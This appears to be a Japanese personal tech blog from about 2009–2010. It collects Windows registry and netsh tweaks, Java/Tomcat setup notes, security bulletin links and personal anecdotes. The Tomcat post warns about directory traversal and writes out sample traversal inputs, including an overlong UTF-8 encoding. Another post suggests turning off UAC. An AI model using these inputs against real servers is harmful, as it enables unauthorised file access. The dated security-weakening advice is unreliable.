http://itpro.nikkeibp.co.jp/article/COLUMN/20100312/345717/ telnet(2)――サーバー・ソフトの確認にも http://itpro.nikkeibp.co.jp/article/COLUMN/20100312/345718/
それはねぇよ… USBメモリーに入っているワードのファイルを直接編集してた時の出来事。 どうもUSBメモリーの空き容量がギリギリだったらしく、上書き保存に失敗。 それだけなら問題ないが、あろう事か元データーまで消しやがった… しかも、ワード落ちるし… みなさん、USBメモリーで直接編集する場合は十二分ご注意を。。。 OS で制限の多いバージョンを出す意味も訳判りませんね。 使いたい機能が制限されている場合は、結局違うアプリで代用しちゃう訳だから 両者に取って損してると思うんだけど… 機能制限してソフトの価格下げるのが目的なんだろうけど これをすると失敗する方が多い気がしますよね?
BOSE M3 昔、発売と同時に購入した製品なんですが、生産終了になってたんですねぇ。。。 600台限定で再販するそうです。  Bose、コンパクトスピーカー「M3」を600台限定で再販  http://plusd.itmedia.co.jp/lifestyle/articles/0901/13/news050.html 場所取らないし、アンプ内臓してますので日本の住宅事情にも優しいです。 但し、BOSE製品は低音が響きますので隣人には優しくないかも。
JAVA の開発環境構築 Java SE Development Kit (JDK) http://java.sun.com/javase/ja/6/download.html ※セットアップ後、環境変数にPathを通しておく。 変数名 JAVA_HOME C:\Program Files\Java\jdk1.6.0_13 Path ;%JAVA_HOME%\BIN <-最後に追加  パスが通ったかの確認は、コマンドプロンプトから  javac -version この時点でメモ帳を使ってコーディング可能。 開発ツールのセットアップ Eclipse Downloads http://www.eclipse.org/downloads/ Eclipse IDE for Java EE Developers (163 MB) http://www.eclipse.org/downloads/download.php?file=/technology/epp/downloads/release/ganymede/SR2/eclipse-jee-ganymede-SR2-win32.zip Eclipse 日本語化言語パック (サードパーティ版) http://www.igapyon.jp/blanco/nlpack/eclipse/index.html Eclipse IDE for Java EE Developers http://sourceforge.jp/projects/nttdatagroup-oss-square/downloads/33232/NLpackja-eclipse-jee-ganymede-SR1-blancofw.zip features,plugins を Eclipse のフォルダへコピー Webアプリの環境構築 Tomcat http://archive.apache.org/dist/tomcat/tomcat-6/ ※v6.0.18 は正常に動かない場合があるので v6.0.16 http://archive.apache.org/dist/tomcat/tomcat-6/v6.0.16/bin/apache-tomcat-6.0.16.exe Tomcat Manager 利用時のアカウントは適当に。 セットアップ後、http://localhost:8080/ でページが表示されればOK Sysdeo Eclipse Tomcat Launcher plugin http://www.eclipsetotale.com/tomcatPlugin.html http://www.eclipsetotale.com/tomcatPlugin/tomcatPluginV321.zip 解凍後のフォルダを丸ごと、dropins に移動。 Eclipse 起動後、ウィンドゥ>設定 で 左のツリーから Tomcat を選択し Tomcatバージョンを 6.x Tomcatホームを C:\Program Files\Apache Software Foundation\Tomcat 6.0 (標準の場合) コンテキスト・ファイルを選択して C:\Program Files\Apache Software Foundation\Tomcat 6.0\conf\Catalina\localhost (標準の場合) とする。 背後で Tomcat 等を動かしている場合は、ディレクトリトラバーサルに注意する。 ../../ こんなんや utf8 で %c0%ae%c0%ae こんなん。  プログラマが知っておきたいJavaと.NETの違い  http://www.atmarkit.co.jp/fjava/rensai4/java_dotnet01/01.html
多層防御を有効にする   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESEARCHPATH_KB963027   値の名前 : iexplore.exe   データの種類 : REG_DWORD   データの値 : 0  コマンドプロンプトから登録するには  REG ADD "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESEARCHPATH_KB963027" /v iexplore.exe /t REG_DWORD /d 0x00000000 /f  MS09-014 - 緊急 Internet Explorer 用の累積的なセキュリティ更新プログラム (963027)  http://www.microsoft.com/japan/technet/security/bulletin/ms09-014.mspx  REG ADD "HKLM\System\CurrentControlSet\Control\Session Manager" /v SafeDllSearchMode /t REG_DWORD /d 1 /f  下記に書かれているレジストリ位置 CCS はおそらくミスでしょう  MS09-015 - 警告 SearchPath の複合的脅威の脆弱性により、特権が昇格される (959426)  http://www.microsoft.com/japan/technet/security/bulletin/ms09-015.mspx  [MS09-015] SearchPath の複合的な攻撃の脆弱性により、特権が昇格される  http://support.microsoft.com/kb/959426
ウェブサイト競争力分析 - MyCompetitor.info http://www.mycompetitor.info/  こんなサイトがあった。  netdive.jp の結果は http://www.mycompetitor.info/dm/netdive.jp  yahoo からのアクセスの方が多い気もするけど、、、
出前館 http://demae-can.com/ せめて、MX レコードに書いてある IP アドレスからメールを送信してください… これじゃスパムと変わらない。。。 SPF 書いてあるのに、記載のないIPアドレスから送信してくる所あるし、、、
Windows Server 2008 の DFS を使った共有。 2003 Server から ip アドレスで繋がらない(アクセスを拒否される) 2008 Server からだと問題なかったから、悩んだ… 名前解決出来ない場合は、hosts ファイルに書いておきましょう。 あと、2008 の UAC はトラブルの元になるので切ってくのが無難。 そろそろ、2008 関連の情報をまとめたい感じ。。。  Windows Server 2008でSuperFetchを有効にする  http://www.atmarkit.co.jp/fwin2k/win2ktips/1216svfetch/svfetch.html
Secunia Personal Software Inspector のメッセージ えぇ?上限100%じゃないんでつか。
MS09-048 で追加されたメモリ負荷に対する保護機能(Memory Pressure Protection)について  TCP スタックの新しいメモリ機能の保護機能の説明  http://support.microsoft.com/kb/974288  DoS による大量の TCP セッションが発生した場合  ランダムにTCP セッションを切断、SYN 要求を拒否し  システムを保護する。  Windows Server 2003 はレジストリでの制御   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters   Internet Protocol version 6 (IPv6):   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters   値の名前   : EnableMPP   データの種類 : REG_DWORD   データの値 : 1(有効) 0 で無効 ※既定は1で有効。   特定のインターフェイスの MPP 設定を無効   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\GUID   Internet Protocol version 6 (IPv6):   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip6\Parameters\Interfaces\GUID   値の名前   : DisableMPPOnIF   データの種類 : REG_DWORD   データの値 : 1 で無効   ポート範囲の除外の追加   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters   Internet Protocol version 6 (IPv6):   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters   値の名前   : MPPExcludedPorts   データの種類 : REG_MULTI_SZ   データの値 : 0 - 65535 例)5000-5010  Windows Vista、 Windows7、Windows Server 2008 では netsh コマンドにて制御   netsh int tcp reset   セキュリティの設定と共に、他の TCP 設定を使用してリセットします。     netsh int tcp show security   現在適用されているセキュリティ設定を表示     netsh int tcp set security mpp=[enabled|disabled|default]   MPP 設定を切り替えます。   netsh int tcp set security Profiles=[enabled|disabled|default]   プロファイルを切り替えます設定します。   netsh int tcp set security startport= numberofports= mpp=[enabled|disabled|default]   ポート範囲の除外の追加(有効なポート範囲は 0 - 65535)    例)    ポート 5000 を 5009 の MPP 機能を無効    netsh int tcp set security startport=5000 numberofports=10 mpp=disabled    追加された除外エントリを削除    netsh int tcp set security startport=5000 numberofports=10 mpp=enable ※ネットワークにつながる全ての機器が対象になりますのでルータ等にもプログラムが出てないか確認しましょう。
auの携帯。 一部の機種で TABLE の入れ子が出来ない… 調べたら AU の XHTML Basic 機では、許されて無いらしい… ソフトバンクは、5個まで。 んー? ソフトバンクって http から https へのリンク、勝手に https://secure.softbank.ne.jp 通すの?ソフトバンクに情報漏れ漏れ?
インスタントコーヒー  スプーン1さじ分とか、出せるように考えれば特許取れるのでは。。。  ブラックで飲むからスプーン使わないのよねぇ…
ネットワーク ダイレクト メモリ アクセス (NetDMA)  有効化  netsh int tcp set global chimney=enabled  無効化  netsh int tcp set global chimney=disabled  現在状態を確認  netsh int tcp show global  ※有効にした場合は、ネットワーク アダプター上の TCP Chimney Offload のチェックを入れること。   NetDMA の有効化   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters   値の名前   : EnableTCPA   データの種類 : REG_DWORD   データの値 : 1 で有効 0 で無効  Windows Server 2008 で TCP Chimney オフロード、受信側のスケーリング、およびダイレクト メモリ アクセスのネットワーク機能に関する情報  http://support.microsoft.com/kb/951037  信頼性に関する更新プログラムの TCP Chimney オフロード機能を Windows Server 2008 と Windows Vista での説明  http://support.microsoft.com/kb/979614  Windows Server 2008 または Windows Vista を実行しているコンピューターで TCP/IP のグローバル パラメーターを変更するのには、netsh コマンドを使用すると TCP/IP パラメーターは、レジストリの一部が正しくない値に変更されます。  http://support.microsoft.com/kb/967224
スケーリングヒューリスティック  有効化  netsh int tcp set heuristics enabled  無効化  netsh int tcp set heuristics disabled  Hotfix improves TCP window scaling in Windows Vista, Windows Server 2008, Windows 7, or Windows Server 2008 R2  http://support.microsoft.com/kb/2780879/en-us
パラレル ポート (Parport) サービスの無効化   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Parport   値の名前   : Start   データの種類 : REG_DWORD   データの値 : 4            2 自動 (デフォルト)            3 手動            4 無効  パラレル ポートを搭載していない Windows Vista ベースまたは Windows Server 2008 ベースのコンピュータでエラー メッセージ "パラレル ポート ドライバ サービスは開始できませんでした" が表示される  http://support.microsoft.com/kb/935497/
リファラー http://www.kojikoji.net/ へのアクセスログですが 2009/10/30 14:46:45 200 GET Monazilla/1.00+(JaneView/0.1.12.1) *.kanagawa.ocn.ne.jp http://www.google.co.jp/search?q=%E5%AF%82%E3%81%97%E3%81%84%E3%82%AA%E3%83%83%E3%83%88%E3%82%BB%E3%82%A4&ie=utf-8&oe=utf-8&aq=t&rls=com.ubuntu:en-US:unofficial&client=firefox-a 「寂しいオットセイ」…ウケたwww いやいや、そんな検索キーワードでは Hit しませんから。 Firefox Extension の RefControl 使ってるのかな。 便利なアドオンとして Web Developer 日本語版 ウェブ制作を補助する拡張機能を追加。 HTML Validator HTML の整合性のチェックに。 Live HTTP Headers ヘッダー情報の確認。 User Agent Switcher ユーザエージェントの変更。 Add N Edit Cookies クッキーの編集。 RefControl サイト毎にリファラのON/OFFとカスタムの設定が出来る。 FoxyProxy プロクシ。固定IPでサーバを立てている場合で外から見たい場合などに。 HackBar XSS や SQL Injection のチェックに。GET や POST、リファラーのテストなど。。。 ShowIP nslookup してくれる。 必須のプラグイン Firebug https://addons.mozilla.jp/firefox/details/1843 Web 開発ツール YSlow https://addons.mozilla.org/en-US/firefox/addon/5369 Webサイトの性能評価 ウェブブラウジングから広告およびトラッキングを排除する「Adblock Plus」、人気を集めてついに1億ダウンロードを達成 http://jp.techcrunch.com/archives/20101117adblock-plus-100-million/
システム ファイル キャッシュの最大値と最小値を設定(Windows Server 2008 まで R2 と Windows7 は対策されています)   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DynCache\Parameters   値の名前   : BackOffMBytesOnLowMemory   データの種類 : REG_DWORD   データの値 : 500(MBytes)    メモリ不足通知のしきい値 0にはしない。    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management    値の名前   : LowMemoryThreshold    データの種類 : REG_DWORD    データの値 : (Mbytes)   値の名前   : MaxSystemCacheMBytes   データの種類 : REG_DWORD   データの値 : 0(default で90%)1-99 ではメモリの割合(%) 200 とするとシステムキャッシュは200MBとなる。   値の名前   : MinSystemCacheMBytes   データの種類 : REG_DWORD   データの値 : 100(MBytes default)   値の名前   : SampleIntervalSecs   データの種類 : REG_DWORD   データの値 : 60(秒) プロセスの動作を監視 0で監視しない   値の名前   : CacheUpdateThresholdMBytes   データの種類 : REG_DWORD   データの値 : 100(0 がデフォルトで 100 MBytes)  Microsoft Windows Dynamic Cache Service  http://www.microsoft.com/downloads/thankyou.aspx?familyId=e24ade0a-5efe-43c8-b9c3-5d0ecb2f39af&displayLang=en  ここのサンプルから、DynCache.exe を %SystemRoot%\System32 へコピー  sc コマンドでサービスとして登録。     sc create DynCache binpath= %SystemRoot%\System32\DynCache.exe start= auto type= own DisplayName= "Dynamic Cache Service"   停止したい場合   sc stop DynCache   削除したい場合   sc delete DynCache   詳しくはダウンロードした付属のファイルを確認。  ほとんどの物理 RAM のシステム ファイルのキャッシュを使用する場合、アプリケーションおよびサービスのパフォーマンスの問題が発生します。  http://support.microsoft.com/kb/976618/ja
お名前.com  2009年11月29日の17時30頃から、サイトに接続できないって事が発生。  問題は、お名前.com の DNS に障害が発生していたようで・・・  復旧が翌日になると言う結構大事な事態に。(中の人はお疲れ様でした)  http://hde03.gmo.jp/c/l/D0001I1595C25487403S18ef3632.html    で、実際の所は何が原因なんですかね。DNS の設定ミス?  外部からの DDoS ?   DNSサーバーがDDoSに悪用される!?/知って得するドメイン名のちょっといい話 #5   http://web-tan.forum.impressrd.jp/e/2009/01/15/4414   「ゾンビPCにやられた」--アカマイ、DNSサーバへのDDoS攻撃を認める   http://japan.cnet.com/news/sec/story/0,2000056024,20069290,00.htm   分散サービス拒否(DDoS)攻撃を仕掛けるDNS ampとは?   http://www.atmarkit.co.jp/fwin2k/win2ktips/781dnsamp/dnsamp.html      DNS の再帰的な問合せを使った DDoS 攻撃の対策について   http://jprs.jp/tech/notice/2006-03-29-dns-cache-server.html   DNS の再帰的な問い合わせを悪用した DDoS 攻撃手法の検証について   http://www.cyberpolice.go.jp/detect/pdf/20060711_DNS-DDoS.pdf 記事になりました。  「お名前.com」のレンタルDNSに障害、3万3000件に影響  http://internet.watch.impress.co.jp/docs/news/20091201_332542.html IPA が注意勧告出しましたね。  ウェブサイトで利用されているDNSサーバの既知の脆弱性への注意喚起  http://www.ipa.go.jp/security/vuln/documents/2009/200912_dns.html まぁ、隠しててもそういう事だったんでしょう。
車上あらし  やられた。  どうやらオートロックが作動してなく、ここ2週間ほど無施錠状態っぽ。 THIS BOΦWY DRASTIC THIS BOΦWY DRAMATIC 悪魔城年代記 悪魔城ドラキュラ Original Soundtrack 任天堂 サウンドヒストリーシリーズ「ゼルダ ザ ミュージック」 [Compilation] [Soundtrack] 「グラディウス」アーケードサウンドトラック レイフォース [CD] ゲーム・ミュージック; ZUNTATA レイストーム [CD] ゲームミュージック; ZUNTATA EXTRA - OFFICIAL COMPILATION TECHNIC BEAT SOUND TRACK 覚えてるのは、これぐらいかなぁ。 アマゾンの中古価格で合計 16,637円。これが時価になるかな。 売っても100円や200円程度かと思って警察に時価総額 1000円ぐらいって話しちゃった。 にしてもセンサーで施錠するはずなのに、ロックされてないってのは頂けない。 どうやら電池交換した時にカス電池を掴まされてた感じ。 ちゃんと国産買いましょう、って事で。。。 電子キーに関わるトラブルは、2005年から2010年までの間に消費者センターに48件の報告があったそうで。 電池切れのトラブルは今後も増えそうですね。 家族に駐車場から車を回してもらって、キー無しで出かけちゃった場合、エンジンを止めたら最後… ドアを開けて30秒以内に電池が切れた場合、閉じ込められるとか…
amazonaws を使ったハッキングについて  結構国内でも、これ使ってフォルダの存在確認してる人が居るようで・・・  匿名だとでも思ってるんでしょうかね。  「攻撃元は『ボットネット』から『クラウド』へ」、ラックが警告 悪用されるクラウドサービス、2009年は攻撃数が5倍以上に  http://itpro.nikkeibp.co.jp/article/NEWS/20091209/341795/  セキュリティにクラウドの闇、Amazon EC2悪用の総当たり攻撃も  http://internet.watch.impress.co.jp/docs/news/20091208_334134.html  ”雲(AWS)”の中に潜んでいたゼウス  http://blog.f-secure.jp/archives/50313859.html
偽アンチウイルスと大差ないじゃん。  フラッシュのアップデート時に、デフォルトでマカフィをインストールさせられる。  ちゃんとチェックを外してればいいんだけど、1クリックで確認無しでインストーラーが  起動してインストールしちゃう。    しかも、インストールされてるアンチウイルスを止めさせて製品版を買わせようとしてる。  偽アンチウイルスソフトとやり方変わらないじゃん!  こんなことしてると、印象や評価、がた落ちだと思うのですが・・・  関連   McAfee Security Scan Plusとは?   http://orbit.cocolog-nifty.com/supportdiary/2010/03/mcafee-security.html
DHL Express を装った ZIP 付きメール(2009.12.9)  スパマー、DHLを悪用してまた悪意のあるメール攻撃  dhl_n756512.zipを開くな!  http://www.sophos.co.jp/pressoffice/news/articles/2009/03/dhl.html  今回の添付は DHL_Label_433.zip となっていますが、まぁこれでしょう。
格安オークション ヤスオク http://www.yasuoku.jp/  すげー、よく考えてるなぁ。    1.商品をアマゾンの買い物カゴに入れて確保しておく。  2.オークションで、1円スタート。  3.入札には専用のコインを買わせておいて、1入札に付き 75円消費させる。  4.入札は1円毎のカウントしかさせない。  5.入札があった場合、20秒延長させる。  6.入札ぎりぎりで自動入札機能。 PlayStation 3 の入札例だと、最終価格 ¥1,411 になってるから 1410回クリックされたとして、1410x75=105750 そりゃ、普通にアマゾンから商品送れるわ。 限りなく詐欺っぽいペニオクその後とまとめ【追記アリ】 http://kyounoare.blog117.fc2.com/blog-entry-1029.html 第42回:入札を競う「ペニーオークション」の実態とは? http://business.nikkeibp.co.jp/article/nmg/20100707/215309/ 「PS3が3000円!」で噂の「ペニーオークション」。その怪しい正体 http://trendy.nikkeibp.co.jp/article/pickup/20101027/1033460/ ネットでだまされない方法35 http://pc.nikkeibp.co.jp/article/basic/20100727/1026427/ 騙されないために、人を騙そうとするテクニックを学ぼう http://www.lifehacker.jp/2010/10/101026_manipulate.html
【やじうまWatch】 ネトラン最終号が店頭に並ぶ、裏表紙には一言「あきらめた。」 ほか -INTERNET Watch http://internet.watch.impress.co.jp/docs/yajiuma/20091210_334667.html  2月号に  「iモーション着うた化UPLOADER」(http: www.netdive.jp i )というサービスを利用するのもオススメだ。  とか書かれてたみたいだけど。。。  http://www.fujisan.co.jp/zasshi-kensaku.asp?sid=227902&q=%83%82%81%5B%83V%83%87%83%93  こういう雑誌を見て犯罪に走る人ってどれぐらい居るんでしょうかね。
今後起こる 20xx年問題。 ・2010年 暗号の問題。もう避けられない? 暗号の2010年問題-@IT       利用率7割のWEPは「1分」で破られる http://itpro.nikkeibp.co.jp/article/COLUMN/20080126/292105/ 文字コードの問題。新常用漢字表が迫るUnicode移行、「シフトJIS」では対応不可能 ・2011年 地上アナログ放送の中止。 ・2014年 D端子・アナログ端子への出力禁止。「2014年以降はD端子への出力を全面禁止」,次世代光ディスクの著作権保護方式が固まる【訂正あり】-Tech-On! ・2036年 コンピュータの誤動作。IT用語辞典バイナリ ・2038年 コンピュータの誤動作。フリー百科事典『ウィキペディア(Wikipedia)』 こんなもん? 続2000年問題 西暦の下二桁が16進で 09 → 10 で 16 になっちゃった系  「2000年問題」が10年遅れてオーストラリアを直撃、金融システムが大混乱に陥る  http://gigazine.net/index.php?/news/comments/20100104_y2k_in_australia/  【韓国】年度変わりで携帯電話の不具合が続発…サムスン、LG、パンテック製など「2010年」のメールなどに不具合 [01/04]  http://yutori7.2ch.net/test/read.cgi/news4plus/1262598626/ 2010年の世界リスク http://eurasiagroup.net/pages/top-risks 1 - US-China relations 2 - Iran 3 - European fiscal divergence 4 - US financial regulation 5 - Japan
自動フォルダ・タイプ機能を無効化(VISTA以降でいけると思う)   HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell   値の名前 : FolderType   データ型 : REG_SZ   値 : NotSpecified          NotSpecified すべての項目          Contacts   連絡先          Documents   ドキュメント          Pictures   画像またはビデオ          Music     音楽の詳細          MusicIcons  ミュージック・アイコン   http://www.atmarkit.co.jp/fwin2k/win2ktips/1022foldertype/foldertype.html   HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell   値の名前 : BagMRU Size   データ型 : REG_DWORD   値 : 1   http://journal.mycom.co.jp/column/windows/016/index.html   名前の変更して勝手にソートするのは勘弁してほしい・・・(必要ならF5キー押すちゅーねん)  フォルダを新規作成し、GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} とリネームすると  GodMode というコントロールパネルになって1画面で操作できるようになるんだとか。  ちなみに Windows Server 2008 R2 でもいけました。  http://www.gizmodo.jp/2010/01/windows7_2.html    Windows 7/Server 2008 R2でクイック起動バーを利用する  http://www.atmarkit.co.jp/fwin2k/win2ktips/1262qlnch/qlnch.html
幻に終わったXboxのドリームキャスト互換・今明かされるその理由 http://news.livedoor.com/article/detail/4548265/  今からでも遅くないから、、、ついでに X68000 も・・・  PowerPC 乗せるみたいだし。   Xbob360の次世代機いよいよ登場か! Xboxポータブル情報も  http://news.livedoor.com/article/detail/4460499/ 終身保険は解約しないと損! “保険なし”でも何とかなる理由 http://trendy.nikkeibp.co.jp/article/pickup/20100108/1030735/?P=1  景気が良かった頃に加入している場合は、金利が銀行よりも良いから解約すると損になると思うが・・・ ASAHIネットの固定IP http://asahi-net.jp/biz/service/option/fixedip/service.html  これいいかも、VPNとかサーバーのメンテナンス用にIPアドレス絞り込むのに。  短期間(1ヶ月だけとか)の場合は、ライブドアなんかを。  http://provider.livedoor.com/
x64 OS でアプリケーションが不安定になる場合  64 ビット バージョンの Windows で動作するアプリケーションからスローされる例外は無視されます。  http://support.microsoft.com/default.aspx/kb/976038   上記で修正パッチを適用後に下記レジストリを追加(未検証)   システム レベルで有効にする   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options   値の名前 : DisableUserModeCallbackFilter   データ型 : REG_DWORD   値 : 1   プロセス レベルで有効にする   HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options   Notepad.exe を追加する場合は、この下に新しいレジストリ サブキー"Notepad.exe"を追加。   後は、サブキーの下に追加   値の名前 : DisableUserModeCallbackFilter   データ型 : REG_DWORD   値 : 1
IE8のバグ?  ASP.NET で HttpUtility.UrlDecode を使って %00 を出力すると、以降のソースが表示されない。  http://www.kojikoji.net/?test=%00  HttpUtility.HtmlDecode は確認してません。また、ファイアフォックス3.6では問題ない。
携帯向けのサービスで、パスワードに数字しか設定してない、設定できない。。。と・・・  ウェブの利用はパソコンからスマートフォンへ--ガートナー予測  http://japan.cnet.com/marketing/story/0,3800080523,20406694,00.htm  携帯サイトを装うフィッシングに注意  http://www.nikkeibp.co.jp/article/column/20100125/206930/  123456にiloveyou…… 流出事件で最も利用されていた平凡すぎるパスワード  http://journal.mycom.co.jp/news/2010/01/25/006/?rt=m&t=o&n=2949
UAC コントロールのレジストリ位置   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System   管理者に対する昇格時の動作(管理者承認モードでの管理者に対する昇格時のプロンプトの動作)   値の名前 : ConsentPromptBehaviorAdmin   データ型 : REG_DWORD   値 : 2(0〜5)          VISTA               Windows7          確認を要求しないで昇格する(0)   確認を要求しないで昇格する(0)          資格情報を要求する(1)       セキュリティで保護された」デスクトップで資格情報を要求する(1)          同意を要求する(2)         セキュリティで保護された」デスクトップで同意を要求する(2)                            資格情報を要求する(3)                            同意を要求する(4)                            Windows以外のバイナリに対する同意を要求する(5)   セキュアデスクトップ(昇格のプロンプト時にセキュリティで保護されたデスクトップに切り替える)   値の名前 : PromptOnSecureDesktop   データ型 : REG_DWORD   値 : 1 (0で無効)   管理者承認モードですべての管理者を実行   値の名前 : EnableLUA   データ型 : REG_DWORD   値 : 1 (0で無効)   アプリケーションインストール時に昇格をプロンプト   値の名前 : EnableInstallerDetection   データ型 : REG_DWORD   値 : 1 (0で無効)   他にもあるけど詳しくは    Windows Vista セキュリティ ガイド    http://technet.microsoft.com/ja-jp/windows/bb629436.aspx    67 Win 7編: UAC設定をレジストリから制御し、スムーズなセキュリティ設定を実現する    http://journal.mycom.co.jp/column/windows/067/  .NET TIPS  管理者としてほかのアプリケーションを実行するには?  http://www.atmarkit.co.jp/fdotnet/dotnettips/954uacrunas/uacrunas.html  ボタンにUACの盾アイコンを表示するには?[C#、VB]  http://www.atmarkit.co.jp/fdotnet/dotnettips/992shieldicon/shieldicon.html
コメントタグに重要なファイルをリンクで残しておくと・・・ ファイルを抜かれますので注意しましょう。  サイバー攻撃の拡大を企業のセキュリティ担当幹部は懸念--マカフィー報告  http://itpro.nikkeibp.co.jp/article/MAG/20100129/343924/  中国発のサイバー攻撃は「重大なターニングポイント」--マカフィー幹部が言及  http://japan.cnet.com/news/sec/story/0,2000056024,20406815,00.htm    ダミーファイルを用意して、アクセスがある IP はブロックするとか  やった方がいいのかも...  中国とか機密情報集めてそうだし。。。  サイバー戦争はもう始まってる? ツールを使って HTML をデザインしている場合で、自動で sitemap.xml が作成される場合も 公開するつもりが無いファイルもリスト化されている場合があるのでご用心。 google さん、容赦ないからキャッシュで丸見えですヨ。 自国のサーチエンジンを動かしたいのは、こういう物を集める事がメインだったりして… google もポリシー次第で米国政府に情報筒抜けになる事をお忘れなく。(Gmail、YouTube、Google Maps、DNS、、、) 日本政府はクラウドとかほざく前に、国産サーチエンジン作れ。。。 google が日本からの IP ブロックしたら死亡フラグ立つ企業とか多そう。 Gmail とか google の解析能力が在れば、情報を抜く事や改ざんも楽勝だろうし。 無料サービスの罠に、みんなどっぷりはまってないですかね。 企業が何の利益も無くサービスを使わせる事は無いと思うのですけど…  LNK脆弱性悪用のStuxnetワームとイランでの高い感染率  https://www.netsecurity.ne.jp/3_15773.html  Stuxnet の PLC 感染プロセスの調査  http://www.symantec.com/connect/ja/blogs/stuxnet-plc
IE の同時ダウンロード数を変更   同時に16個ダウンロードできるように変更   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings   値の名前 : MaxConnectionsPer1_0Server   データ型 : REG_DWORD   値 : 0x10   値の名前 : MaxConnectionsPerServer   データ型 : REG_DWORD   値 : 0x10   IE8 の場合   HTTP 1.1 接続で使用する接続制限を変更   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER   値の名前 : iexplore.exe   データ型 : REG_DWORD   値 : 0x10   ※IE7 までは 2つ IE8 で6個になっています。  参考   一度に 3 つ以上のファイルをダウンロードできるように Internet Explorer を構成する方法   http://support.microsoft.com/kb/282402/ja
TLS/SSL 再ネゴシエーションを無効にする   HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL   値の名前 : DisableRenegoOnClient   データ型 : REG_DWORD   値 : 1          0 又は値が存在しない場合:              クライアントは再ネゴシエーションを開始する。              クライアントは再ネゴシエーションに応答する。          0以外: クライアントは再ネゴシエーションを開始しない。              クライアントは再ネゴシエーションに応答しない。   値の名前 : DisableRenegoOnServer   データ型 : REG_DWORD   値 : 1          0 又は値が存在しない場合:              サーバーが開始する再ネゴシエーションは許可される。              クライアントは再ネゴシエーションに応答する。          0以外: サーバーが開始する再ネゴシエーションは許可されない。              サーバーはクライアントからの再ネゴシエーション要求に応答する。   参考    マイクロソフト セキュリティ アドバイザリ: TLS/SSL の脆弱性により、なりすましが行われる    http://support.microsoft.com/kb/977377
USTREAMtwitter  ストリーム放送局が流行るのかな・・・  “ダダ漏れ”と呼ばれるネット中継  http://www.nikkeibp.co.jp/article/column/20100309/214840/?P=1
Portable tool  USBメモリー常備ソフト9  http://pc.nikkeibp.co.jp/article/special/20100224/1023170/  厳選 USBメモリーで持ち運べるフリーソフト  http://pc.nikkeibp.co.jp/article/special/20090624/1016321/  USB Tools  http://usbtools.jp/
L3 スイッチと フィルタ型ルーティング  「ルータとL3スイッチの違い」を正しく説明できますか? [第1回]ルータとL3スイッチが誕生した理由  http://www.computerworld.jp/news/net/142449.html  フィルタ型ルーティング  http://www.rtpro.yamaha.co.jp/RT/docs/filter-routing/filter-routing.html
異なるバージョンの Windows を実行している自宅用コンピューターのネットワーク http://windows.microsoft.com/ja-JP/windows7/Networking-home-computers-running-different-versions-of-Windows  VISTA 以降に出来たネットワークの場所    ホーム   インターネットからある程度保護されている場合に設定  社内    インターネットからある程度保護されている場合に設定  パブリック 公共で使用できるネットワークに接続されている場合に設定  ドメイン  オプションとしては使用できない。ドメイン管理者が設定する必要がある。    ※既知で信頼されたネットワークである場合にのみ、ネットワークをホームまたは社内に変更する。  他の Windows Vista または Windows 7 を検出するには  TCP/5357, 5358 と UDP/3702, 5355 を開く。  以前のバージョンの Windows を検出するには  TCP/139, 445 と UDP/137, 138, 5355 を開く。     Windows7 から XP を検出させるには XP に Link-Layer Topology Discovery (LLTD) プロトコルを   インストールしなければならない場合がる。    Windows Vista のネットワーク マップに Windows XP を実行しているコンピュータが表示されない    http://support.microsoft.com/kb/922120  ネットワーク デバイスを検出するには  TCP/2869, 5357, 5358 と UDP/1900, 3702, 5355 を開く。  Windows 7 同士でホームグループを正しく動作させるには  TCP/139, 445, 2869, 3587, 5357, 5358 と UDP/137, 138, 1900, 3540, 3702, 5355 を開く。  第9回 Windows 7のファイアウォール機能  http://www.atmarkit.co.jp/fwin2k/win7/09network2/09network2_01.html  システム構成の自動化 〜 新しいネットワークを検出したタイミングでの自動実行  http://www.computerworld.jp/topics/mws/178649.html
